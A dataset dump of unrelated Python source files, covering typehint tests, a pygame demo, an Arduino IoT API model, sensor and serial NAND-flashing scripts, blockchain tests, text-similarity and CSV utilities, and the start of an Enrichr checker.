content stringlengths 5 1.05M |
|---|
#!/usr/bin/env python
# coding=utf-8
"""
verify typehints match expected objects
no method found to directly check object instances against non-trivial typehints.
isinstance(«object», «typehint») fails with
`TypeError: isinstance() argument 2 cannot be a parameterized generic`
Some tools exist to parse typehint details, but that then relies on the parsing
code interpretation.
IE: is tuple() a valid match for tuple[int, ...]?
"""
# import unittest
# import pytest
# import os
# import sys
# import inspect
import automata_typehints as AHint
# remove need to add parent to path?
# `pipenv run python -m pytest «»`
# ? -q
# class ConstructorArgumentsTestCase(unittest.TestCase):
# def setUp(self):
# pass # run before each individual test
# def tearDown(self):
# pass
# def test_neighbourhood_data_type(self):
# self.assertRaises(TypeError)
def test_not_cell_address():
assert not isinstance(None, AHint.CellAddressType)
assert not isinstance(tuple(), AHint.CellAddressType)
def test_is_cell_address():
assert isinstance((0,), AHint.CellAddressType)
# if __name__ == '__main__':
# unittest.main()
|
import pygame, sys
from pygame.locals import *
from sys import exit
class Player(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.Surface([30,30])
self.image.fill([255,0,0])
self.rect = self.image.get_rect()
def move_player(self):
key = pygame.key.get_pressed()
if key[pygame.K_DOWN]:
self.rect.y += 1
elif key[pygame.K_UP]:
self.rect.y -= 1
elif key[pygame.K_RIGHT]:
self.rect.x += 1
elif key[pygame.K_LEFT]:
self.rect.x -= 1
def add_to_group(self):
all_sprite_list.add(self)
def remove_from_group(self):
all_sprite_list.remove(self)
def draw(self,surface):
surface.blit(self.image,(self.rect.x, self.rect.y))
###pygame.image.load(os.path.join('player', 'Player.png'))
pygame.init()
screen = pygame.display.set_mode((500,500))
player = Player()
def drawscreen():
pygame.draw.rect(screen, (250, 250, 250), (0, 0, 500, 500))
def drawplayer():
player.draw(screen)
while True: # main game loop
drawscreen()
player.move_player()
drawplayer()
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
pygame.display.update()
|
# coding: utf-8
"""
Arduino IoT Cloud API
Provides a set of endpoints to manage Arduino IoT Cloud **Devices**, **Things**, **Properties** and **Timeseries**. This API can be called just with any HTTP Client, or using one of these clients: * [Javascript NPM package](https://www.npmjs.com/package/@arduino/arduino-iot-client) * [Python PYPI Package](https://pypi.org/project/arduino-iot-client/) * [Golang Module](https://github.com/arduino/iot-client-go) # noqa: E501
The version of the OpenAPI document: 2.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from arduino_iot_rest.configuration import Configuration
class ModelProperty(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'max_value': 'float',
'min_value': 'float',
'name': 'str',
'permission': 'str',
'persist': 'bool',
'tag': 'float',
'type': 'str',
'update_parameter': 'float',
'update_strategy': 'str',
'variable_name': 'str'
}
attribute_map = {
'max_value': 'max_value',
'min_value': 'min_value',
'name': 'name',
'permission': 'permission',
'persist': 'persist',
'tag': 'tag',
'type': 'type',
'update_parameter': 'update_parameter',
'update_strategy': 'update_strategy',
'variable_name': 'variable_name'
}
def __init__(self, max_value=None, min_value=None, name=None, permission=None, persist=False, tag=None, type=None, update_parameter=None, update_strategy=None, variable_name=None, local_vars_configuration=None): # noqa: E501
"""ModelProperty - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._max_value = None
self._min_value = None
self._name = None
self._permission = None
self._persist = None
self._tag = None
self._type = None
self._update_parameter = None
self._update_strategy = None
self._variable_name = None
self.discriminator = None
if max_value is not None:
self.max_value = max_value
if min_value is not None:
self.min_value = min_value
self.name = name
self.permission = permission
if persist is not None:
self.persist = persist
if tag is not None:
self.tag = tag
self.type = type
if update_parameter is not None:
self.update_parameter = update_parameter
self.update_strategy = update_strategy
if variable_name is not None:
self.variable_name = variable_name
@property
def max_value(self):
"""Gets the max_value of this ModelProperty. # noqa: E501
Maximum value of this property # noqa: E501
:return: The max_value of this ModelProperty. # noqa: E501
:rtype: float
"""
return self._max_value
@max_value.setter
def max_value(self, max_value):
"""Sets the max_value of this ModelProperty.
Maximum value of this property # noqa: E501
:param max_value: The max_value of this ModelProperty. # noqa: E501
:type: float
"""
self._max_value = max_value
@property
def min_value(self):
"""Gets the min_value of this ModelProperty. # noqa: E501
Minimum value of this property # noqa: E501
:return: The min_value of this ModelProperty. # noqa: E501
:rtype: float
"""
return self._min_value
@min_value.setter
def min_value(self, min_value):
"""Sets the min_value of this ModelProperty.
Minimum value of this property # noqa: E501
:param min_value: The min_value of this ModelProperty. # noqa: E501
:type: float
"""
self._min_value = min_value
@property
def name(self):
"""Gets the name of this ModelProperty. # noqa: E501
The friendly name of the property # noqa: E501
:return: The name of this ModelProperty. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this ModelProperty.
The friendly name of the property # noqa: E501
:param name: The name of this ModelProperty. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and name is None: # noqa: E501
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def permission(self):
"""Gets the permission of this ModelProperty. # noqa: E501
The permission of the property # noqa: E501
:return: The permission of this ModelProperty. # noqa: E501
:rtype: str
"""
return self._permission
@permission.setter
def permission(self, permission):
"""Sets the permission of this ModelProperty.
The permission of the property # noqa: E501
:param permission: The permission of this ModelProperty. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and permission is None: # noqa: E501
raise ValueError("Invalid value for `permission`, must not be `None`") # noqa: E501
allowed_values = ["READ_ONLY", "READ_WRITE"] # noqa: E501
if self.local_vars_configuration.client_side_validation and permission not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `permission` ({0}), must be one of {1}" # noqa: E501
.format(permission, allowed_values)
)
self._permission = permission
@property
def persist(self):
"""Gets the persist of this ModelProperty. # noqa: E501
If true, data will persist into a timeseries database # noqa: E501
:return: The persist of this ModelProperty. # noqa: E501
:rtype: bool
"""
return self._persist
@persist.setter
def persist(self, persist):
"""Sets the persist of this ModelProperty.
If true, data will persist into a timeseries database # noqa: E501
:param persist: The persist of this ModelProperty. # noqa: E501
:type: bool
"""
self._persist = persist
@property
def tag(self):
"""Gets the tag of this ModelProperty. # noqa: E501
The integer id of the property # noqa: E501
:return: The tag of this ModelProperty. # noqa: E501
:rtype: float
"""
return self._tag
@tag.setter
def tag(self, tag):
"""Sets the tag of this ModelProperty.
The integer id of the property # noqa: E501
:param tag: The tag of this ModelProperty. # noqa: E501
:type: float
"""
self._tag = tag
@property
def type(self):
"""Gets the type of this ModelProperty. # noqa: E501
The type of the property # noqa: E501
:return: The type of this ModelProperty. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this ModelProperty.
The type of the property # noqa: E501
:param type: The type of this ModelProperty. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and type is None: # noqa: E501
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
allowed_values = ["ANALOG", "CHARSTRING", "FLOAT", "INT", "LENGHT_C", "LENGHT_I", "LENGHT_M", "PERCENTAGE", "STATUS", "TEMPERATURE_C", "TEMPERATURE_F", "METER", "KILOGRAM", "GRAM", "SECOND", "AMPERE", "KELVIN", "CANDELA", "MOLE", "HERTZ", "RADIAN", "STERADIAN", "NEWTON", "PASCAL", "JOULE", "WATT", "COULOMB", "VOLT", "FARAD", "OHM", "SIEMENS", "WEBER", "TESLA", "HENRY", "DEGREES_CELSIUS", "LUMEN", "LUX", "BECQUEREL", "GRAY", "SIEVERT", "KATAL", "SQUARE_METER", "CUBIC_METER", "LITER", "METER_PER_SECOND", "METER_PER_SQUARE_SECOND", "CUBIC_METER_PER_SECOND", "LITER_PER_SECOND", "WATT_PER_SQUARE_METER", "CANDELA_PER_SQUARE_METER", "BIT", "BIT_PER_SECOND", "DEGREES_LATITUDE", "DEGREES_LONGITUDE", "PH_VALUE", "DECIBEL", "DECIBEL_1W", "BEL", "COUNT", "RATIO_DIV", "RATIO_MOD", "PERCENTAGE_RELATIVE_HUMIDITY", "PERCENTAGE_BATTERY_LEVEL", "SECONDS_BATTERY_LEVEL", "EVENT_RATE_SECOND", "EVENT_RATE_MINUTE", "HEART_RATE", "HEART_BEATS", "SIEMENS_PER_METER", "LOCATION", "COLOR_HSB", "COLOR_RGB", "GENERIC_COMPLEX_PROPERTY", "HOME_COLORED_LIGHT", "HOME_DIMMED_LIGHT", "HOME_LIGHT", "HOME_CONTACT_SENSOR", "HOME_MOTION_SENSOR", "HOME_SMART_PLUG", "HOME_TEMPERATURE", "HOME_TEMPERATURE_C", "HOME_TEMPERATURE_F", "HOME_SWITCH", "HOME_TELEVISION", "ENERGY", "FORCE", "TEMPERATURE", "POWER", "ELECTRIC_CURRENT", "ELECTRIC_POTENTIAL", "ELECTRICAL_RESISTANCE", "CAPACITANCE", "TIME", "FREQUENCY", "DATA_RATE", "ACCELERATION", "AREA", "LENGTH", "VELOCITY", "MASS", "VOLUME", "FLOW_RATE", "ANGLE", "ILLUMINANCE", "LUMINOUS_FLUX", "LUMINANCE", "LUMINOUS_INTENSITY", "LOGARITHMIC_QUANTITY", "PRESSURE", "INFORMATION_CONTENT", "SCHEDULE"] # noqa: E501
if self.local_vars_configuration.client_side_validation and type not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `type` ({0}), must be one of {1}" # noqa: E501
.format(type, allowed_values)
)
self._type = type
@property
def update_parameter(self):
"""Gets the update_parameter of this ModelProperty. # noqa: E501
The update frequency in seconds, or the amount of the property has to change in order to trigger an update # noqa: E501
:return: The update_parameter of this ModelProperty. # noqa: E501
:rtype: float
"""
return self._update_parameter
@update_parameter.setter
def update_parameter(self, update_parameter):
"""Sets the update_parameter of this ModelProperty.
The update frequency in seconds, or the amount of the property has to change in order to trigger an update # noqa: E501
:param update_parameter: The update_parameter of this ModelProperty. # noqa: E501
:type: float
"""
self._update_parameter = update_parameter
@property
def update_strategy(self):
"""Gets the update_strategy of this ModelProperty. # noqa: E501
The update strategy for the property value # noqa: E501
:return: The update_strategy of this ModelProperty. # noqa: E501
:rtype: str
"""
return self._update_strategy
@update_strategy.setter
def update_strategy(self, update_strategy):
"""Sets the update_strategy of this ModelProperty.
The update strategy for the property value # noqa: E501
:param update_strategy: The update_strategy of this ModelProperty. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and update_strategy is None: # noqa: E501
raise ValueError("Invalid value for `update_strategy`, must not be `None`") # noqa: E501
allowed_values = ["ON_CHANGE", "TIMED"] # noqa: E501
if self.local_vars_configuration.client_side_validation and update_strategy not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `update_strategy` ({0}), must be one of {1}" # noqa: E501
.format(update_strategy, allowed_values)
)
self._update_strategy = update_strategy
@property
def variable_name(self):
"""Gets the variable_name of this ModelProperty. # noqa: E501
The sketch variable name of the property # noqa: E501
:return: The variable_name of this ModelProperty. # noqa: E501
:rtype: str
"""
return self._variable_name
@variable_name.setter
def variable_name(self, variable_name):
"""Sets the variable_name of this ModelProperty.
The sketch variable name of the property # noqa: E501
:param variable_name: The variable_name of this ModelProperty. # noqa: E501
:type: str
"""
if (self.local_vars_configuration.client_side_validation and
variable_name is not None and len(variable_name) > 64):
raise ValueError("Invalid value for `variable_name`, length must be less than or equal to `64`") # noqa: E501
if (self.local_vars_configuration.client_side_validation and
variable_name is not None and not re.search(r'^[a-zA-Z_][a-zA-Z0-9_]*$', variable_name)): # noqa: E501
raise ValueError(r"Invalid value for `variable_name`, must be a follow pattern or equal to `/^[a-zA-Z_][a-zA-Z0-9_]*$/`") # noqa: E501
self._variable_name = variable_name
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ModelProperty):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ModelProperty):
return True
return self.to_dict() != other.to_dict()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
/*
* Copyright (c) 2015, WSO2 Inc. (http://www.wso2.org) All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
"""
import Adafruit_DHT # Adafruit library required for temperature sensing
TEMP_PIN = 4
TEMP_SENSOR_TYPE = 11
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Reading temperature
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def readTemperature():
# Try to grab a sensor reading. Use the read_retry method which will retry up
# to 15 times to get a sensor reading (waiting 2 seconds between each retry).
while True:
try:
humidity, temperature = Adafruit_DHT.read_retry(TEMP_SENSOR_TYPE, TEMP_PIN)
print '{0:0.1f}C:{1:0.1f}%'.format(temperature, humidity)
# print 'RASPBERRY_STATS: Temp={0:0.1f}*C Humidity={1:0.1f}%'.format(temperature, humidity)
# return (temperature + ":" + humidity)
return
except Exception, e:
print "RASPBERRY_STATS: Exception in TempReaderThread: Could not successfully read Temperature"
print ("RASPBERRY_STATS: " + str(e))
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
pass
time.sleep(3)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# The Main method of the server script
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def main():
readTemperature()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if __name__ == '__main__':
main() |
import re
from datetime import datetime
import pytest
from pydantic import ValidationError
from node.blockchain.facade import BlockchainFacade
from node.blockchain.inner_models import (
AccountState, BlockMessage, BlockMessageUpdate, CoinTransferBlockMessage, CoinTransferSignedChangeRequest
)
from node.blockchain.types import Type
@pytest.mark.usefixtures('base_blockchain')
def test_create_from_signed_change_request(
coin_transfer_signed_change_request_message, treasury_account_key_pair, treasury_amount
):
request = CoinTransferSignedChangeRequest.create_from_signed_change_request_message(
message=coin_transfer_signed_change_request_message,
signing_key=treasury_account_key_pair.private,
)
blockchain_facade = BlockchainFacade.get_instance()
expected_block_number = blockchain_facade.get_next_block_number()
expected_identifier = blockchain_facade.get_next_block_identifier()
message = BlockMessage.create_from_signed_change_request(request, blockchain_facade)
assert message.number == expected_block_number
assert message.identifier == expected_identifier
assert message.type == Type.COIN_TRANSFER
assert isinstance(message.timestamp, datetime)
assert message.timestamp.tzinfo is None
update = message.update
assert update.accounts.get(request.signer) == AccountState(
account_lock=request.make_hash(),
balance=treasury_amount - coin_transfer_signed_change_request_message.get_total_amount(),
)
assert update.schedule is None
def test_serialize_deserialize_works(coin_transfer_block_message):
serialized = coin_transfer_block_message.json()
deserialized = BlockMessage.parse_raw(serialized)
assert deserialized.type == coin_transfer_block_message.type
assert deserialized.number == coin_transfer_block_message.number
assert deserialized.identifier == coin_transfer_block_message.identifier
assert deserialized.timestamp == coin_transfer_block_message.timestamp
assert deserialized.request.signer == coin_transfer_block_message.request.signer
assert deserialized.request.signature == coin_transfer_block_message.request.signature
assert deserialized.request.message == coin_transfer_block_message.request.message
assert deserialized.request == coin_transfer_block_message.request
assert deserialized.update == coin_transfer_block_message.update
assert deserialized == coin_transfer_block_message
serialized2 = deserialized.json()
assert serialized == serialized2
def test_block_identifier_is_mandatory(treasure_coin_transfer_signed_change_request, treasury_account_key_pair):
CoinTransferBlockMessage(
number=1,
identifier='0' * 64,
timestamp=datetime.utcnow(),
request=treasure_coin_transfer_signed_change_request,
update=BlockMessageUpdate(accounts={'0' * 64: AccountState(balance=10)}),
)
with pytest.raises(ValidationError) as exc_info:
CoinTransferBlockMessage(
number=1,
identifier=None,
timestamp=datetime.utcnow(),
request=treasure_coin_transfer_signed_change_request,
update=BlockMessageUpdate(accounts={'0' * 64: AccountState(balance=10)}),
)
assert re.search(r'identifier.*none is not an allowed value', str(exc_info.value), flags=re.DOTALL)
|
"""
xbox360-arduino-flasher
--Ian Ling (https://iancaling.com)
Dumps xbox360 NAND via an Arduino
"""
import serial
import struct
from math import floor
from sys import argv, exit
from time import time
# globals
SERIAL_DEVICE = "/dev/ttyACM0"
BAUD_RATE = 115200
DUMP_COMMAND = b"d"
FLASH_COMMAND = b"f"
FLASH_CONFIG_COMMAND = b"c"
OUT_FILE = "dump.bin"
arduino = serial.Serial(SERIAL_DEVICE, BAUD_RATE, timeout=0)
# dump
if argv[1] == "d":
f = open("dump.bin", "wb")
arduino.write(DUMP_COMMAND)
expected_length = 17301504
percent_done = 0
i = 0
start_time = time()
print(f"Started at {start_time}")
while i < expected_length:
data = arduino.read(BAUD_RATE // 8)
i += len(data)
f.write(data)
previous_percent_done = percent_done
percent_done = floor(i/expected_length*100)
if percent_done - previous_percent_done > 0:
time_elapsed = time() - start_time
print(f"\r \r{percent_done}% -- {i // time_elapsed}Bps", end="")
end_time = time()
print(f"\nFinished at {end_time}")
f.close()
# flash
elif argv[1] == "f":
arduino.write(FLASH_COMMAND)
# send length of file to write
f = open(argv[2], 'rb')
data = f.read()
f.close()
file_length = len(data)
arduino.write(struct.pack(">I", file_length))
# read back length from arduino
expected_length = 11 # max length of a uint32_t cast to a string is 10 characters
buffer = b""
while len(buffer) < expected_length:
if len(buffer) > 0:
print(repr(buffer))
buffer += arduino.read(BAUD_RATE // 8)
# throw out everything after the null byte (arduino sent a null terminated string)
buffer = buffer[0:buffer.index(b"\x00")]
if int(buffer) != file_length:
print("Arduino sent back the wrong data length, aborting. No data was written, NAND is unaltered.")
exit(1)
print("Handshake successful, waiting for Arduino to request data...")
# send data to arduino 1 page (528 bytes) at a time
i = 0
percent_done = 0
arduino_ready_to_receive = False
start_time = time()
print(f"Started at {start_time}")
while i < file_length:
# wait for arduino to tell us it's ready to receive data
while not arduino_ready_to_receive:
if arduino.read(BAUD_RATE // 8) == b"\x00":
arduino_ready_to_receive = True
data_to_send = data[i:i + 528]
arduino.write(data_to_send)
i += 528
arduino_ready_to_receive = False
previous_percent_done = percent_done
percent_done = floor(i/file_length*100)
if percent_done - previous_percent_done > 0:
time_elapsed = time() - start_time
print(f"\r \r{percent_done}% -- {i // time_elapsed}Bps", end="")
end_time = time()
print(f"\nFinished at {end_time}")
# check flash config
elif argv[1] == "c":
arduino.write(FLASH_CONFIG_COMMAND)
expected_length = 4 # flash config is 4 bytes long
buffer = b""
while len(buffer) < expected_length:
buffer += arduino.read(BAUD_RATE // 8)
print(repr(buffer))
|
from setuptools import setup
with open("README.md","r") as fh:
long_description=fh.read()
setup(
name='hithere',
version='0.0.1',
description="Say hi !!",
py_modules=["hithere"],
package_dir={'':'src'},
long_description=long_description,
long_description_content_type="text/markdown",
install_requires=[
"blessings ~= 1.7",
],
extras_require={
"dev":[
"pytest>=3.7.4",
],
},
url="https://github.com/abinashstack/pypi",
author="Abinash Gogoi",
author_email="abinash.gogoi55@gmail.com"
) |
#!/usr/bin/env python
##########################################################################################
# Developer: Icaro Alzuru Project: HuMaIN (http://humain.acis.ufl.edu)
# Description:
# Compares the text files of two directories using the Damerau-Levenshtein similarity.
#
##########################################################################################
# Copyright 2019 Advanced Computing and Information Systems (ACIS) Lab - UF
# (https://www.acis.ufl.edu/)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################################
import sys, os, argparse
import pandas as pd
from pyxdameraulevenshtein import normalized_damerau_levenshtein_distance
# ----------------------------------------------------------------------------------
def compare_DL( filename1, filename2 ):
# Sanity check
if not os.path.isfile(filename1):
print('\nERROR: First source file ' + filename1 + ' was not found.\n')
return(-3)
if not os.path.isfile(filename2):
print('\nERROR: Second source file ' + filename2 + ' was not found.\n')
return(-4)
# Read the content of the first file
text1 = ""
f1 = None
with open( filename1 ) as f1:
lines1 = [line.rstrip('\n') for line in f1]
for line in lines1:
text1 += line + ' '
text1 = text1[:-1]
# Read the content of the second file
text2 = ""
f2 = None
with open( filename2 ) as f2:
lines2 = [line.rstrip('\n') for line in f2]
for line in lines2:
text2 += line + ' '
text2 = text2[:-1]
sim = 1.0 - normalized_damerau_levenshtein_distance( text1, text2 )
return( sim )
# Use: python3 ../ALOT/fulltext_similarity_DL_dir.py -d1 ./biocolls/digi_13297227/fulltext -d2 ./fulltext/digi_13297227_google -o DL_comparison/digi_13297227_google.csv
# ----------------------------------------------------------------------------------
if __name__ == '__main__':
""" Compares the text files of two directories using the Damerau-Levenshtein similarity.
"""
# Read arguments
parser = argparse.ArgumentParser("Compares the text files of two directories using the Damerau-Levenshtein similarity.")
parser.add_argument('-d1','--dir1',action="store", required=True, help="First directory.")
parser.add_argument('-d2','--dir2',action="store", required=True, help="Second directory.")
parser.add_argument('-o','--output',action="store", required=True, help="Path + filename of the csv file which will store the output.")
args = parser.parse_args()
# Sanity check
if not os.path.isdir( args.dir1 ):
print('\nERROR: First directory ' + args.dir1 + ' was not found.\n')
parser.print_help()
sys.exit(-1)
if not os.path.isdir( args.dir2 ):
print('\nERROR: Second directory ' + args.dir2 + ' was not found.\n')
parser.print_help()
sys.exit(-2)
# Create the lists of files to process
files_list = list()
for root, dirs, filenames in os.walk( args.dir1 ):
files_list = list(f for f in filenames if f.endswith('.txt'))
# Process each text file
with open( args.output, 'w+') as f_out:
for filename in files_list:
path_filename_1 = args.dir1 + '/' + filename
path_filename_2 = args.dir2 + '/' + filename
sim = compare_DL( path_filename_1, path_filename_2 )
if sim >= 0.0:
f_out.write(filename + ',' + str(sim) + '\n')
|
#! /usr/bin/env python
############################################################################
# Copyright (c) 2009 Dr. Peter Bunting, Aberystwyth University
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#
# Purpose: The generation a row summary for each class.
#
# Author: Pete Bunting
# Email: pete.bunting@aber.ac.uk
# Date: 22/09/2009
# Version: 1.0
#
# History:
# Version 1.0 - Created.
#
#############################################################################
import os.path
import sys
def checkforHash(line):
foundHash = False
for i in range(len(line)):
if line[i] == '#':
foundHash = True
return foundHash
def stringTokenizer(line, delimiter):
tokens = list()
token = str()
for i in range(len(line)):
if line[i] == delimiter:
tokens.append(token)
token = str()
else:
token = token + line[i]
tokens.append(token)
return tokens
class SummaryRows (object):
def readVariableNames(self, inputCSV):
dataFile = open(inputCSV, 'r')
line = dataFile.readline()
tokens = stringTokenizer(line, ',')
variables = list()
first = True
for token in tokens:
if first:
first = False
else:
variables.append(token.strip())
dataFile.close()
return variables
def readCSVFileVariables(self, inputCSV, numVariables):
data = list()
dataFile = open(inputCSV, 'r')
first = True
numVariables = numVariables + 1 # The class column
for eachLine in dataFile:
comment = checkforHash(eachLine)
if comment == False:
if first:
first = False
else:
tokens = stringTokenizer(eachLine, ',')
if len(tokens) == numVariables:
dataElement = list()
firstElement = True
for token in tokens:
if firstElement:
dataElement.append(str(token.strip()))
firstElement = False
else:
dataElement.append(float(token.strip()))
data.append(dataElement)
else:
raise Exception('Not enough tokens in a inputCSV line')
dataFile.close()
return data
def getClassnames(self, data):
classnames = list()
for item in data:
found = False
for classname in classnames:
if item[0] == classname:
found = True
if not found:
classnames.append(item[0])
return classnames
def getDataSummary(self, data, classname):
summary = list()
count = 0;
total = 0;
first = True
for item in data:
if first:
first = False
firstItem = True
for i in range(len(item)):
if firstItem:
firstItem = False
summary.append(classname)
else:
summary.append(0)
if item[0] == classname:
firstItem = True
for i in range(len(item)):
if firstItem:
firstItem = False
else:
summary[i] = summary[i] + item[i]
total = total + item[i];
count = count + 1
first = True
for i in range(len(summary)):
if first:
first = False
else:
summary[i] = (summary[i]/total)*100
return summary
def createOutput(self, data, outputCSV, classnames, variables):
outFile = open(outputCSV, 'w')
outFile.write("class")
for var in variables:
outFile.write(",")
outFile.write(var)
outFile.write("\n")
for classname in classnames:
summary = self.getDataSummary(data, classname)
first = True
for item in summary:
if first:
outFile.write(str(item))
first = False
else:
outFile.write(",")
outFile.write(str(item))
outFile.write("\n")
print summary
outFile.flush()
outFile.close()
def run(self):
numArgs = len(sys.argv)
if numArgs == 3:
inputCSV = sys.argv[1].strip()
outputCSV = sys.argv[2].strip()
variables = self.readVariableNames(inputCSV)
data = self.readCSVFileVariables(inputCSV, len(variables))
classnames = self.getClassnames(data)
self.createOutput(data, outputCSV, classnames, variables)
print classnames
else:
self.help()
def help(self):
print 'CSVClassPlot.py script generates a summary row for each class in the input CSV file\n'
print 'Usage (1): python summaryrows.py <INPUT.csv> <OUTPUT_CSV>'
if __name__ == '__main__':
obj = SummaryRows()
obj.run()
|
from django.shortcuts import render
#from arches.app.models.system_settings import settings
def index(request):
return render(request, 'index.htm')
|
"""Extension of utilities.py to provide functions required to check the
version information of enrichr and determine if it needs to be updated.
Classes:
Enrichr: Extends the SrcClass class and provides the static variables and
enrichr specific functions required to perform a check on enrichr.
Functions:
get_SrcClass: returns a Enrichr object
main: runs compare_versions (see utilities.py) on a Enrichr object
"""
import csv
import hashlib
import os
import config_utilities as cf
import table_utilities as tu
from check_utilities import SrcClass, compare_versions
def get_SrcClass(args):
"""Returns an object of the source class.
This returns an object of the source class to allow access to its functions
if the module is imported.
Args:
Returns:
class: a source class object
"""
return Enrichr(args)
class Enrichr(SrcClass):
"""Extends SrcClass to provide enrichr specific check functions.
This Enrichr class provides source-specific functions that check the
enrichr version information and determine if it differs from the current
version in the Knowledge Network (KN).
Attributes:
see utilities.SrcClass
"""
def __init__(self, args=cf.config_args()):
"""Init a Enrichr with the staticly defined parameters.
This calls the SrcClass constructor (see utilities.SrcClass)
"""
name = 'enrichr'
url_base = ('http://amp.pharm.mssm.edu/Enrichr/'
'geneSetLibrary?mode=text&libraryName=')
aliases = {
"Achilles_fitness_decrease": "achilles_genetic_fitness::ach_dn",
"Achilles_fitness_increase": "achilles_genetic_fitness::ach_up",
"Aging_Perturbations_from_GEO_down": "GEO_expression_set::aging_dn",
"Aging_Perturbations_from_GEO_up": "GEO_expression_set::aging_up",
"Allen_Brain_Atlas_down": "allen_brain_atlas_signature::aba_dn",
"Allen_Brain_Atlas_up": "allen_brain_atlas_signature::aba_up",
"Cancer_Cell_Line_Encyclopedia": "enrichr_cell_signature::ccle",
"ChEA_2015": "enrichr_ChIP_gene_set::chea",
"dbGaP": "enrichr_phenotype_signature::dbgap",
"Disease_Perturbations_from_GEO_down": "GEO_expression_set::dis-pert_dn",
"Disease_Perturbations_from_GEO_up": "GEO_expression_set::dis-pert_up",
"Disease_Signatures_from_GEO_down_2014": "GEO_expression_set::dis-sig_dn",
"Disease_Signatures_from_GEO_up_2014": "GEO_expression_set::dis-sig_up",
"Drug_Perturbations_from_GEO_2014": "GEO_expression_set::drug_pert",
"Drug_Perturbations_from_GEO_down": "GEO_expression_set::drug_dn",
"Drug_Perturbations_from_GEO_up": "GEO_expression_set::drug_up",
"ENCODE_Histone_Modifications_2015": "enrichr_ChIP_gene_set::ENCODE_HM",
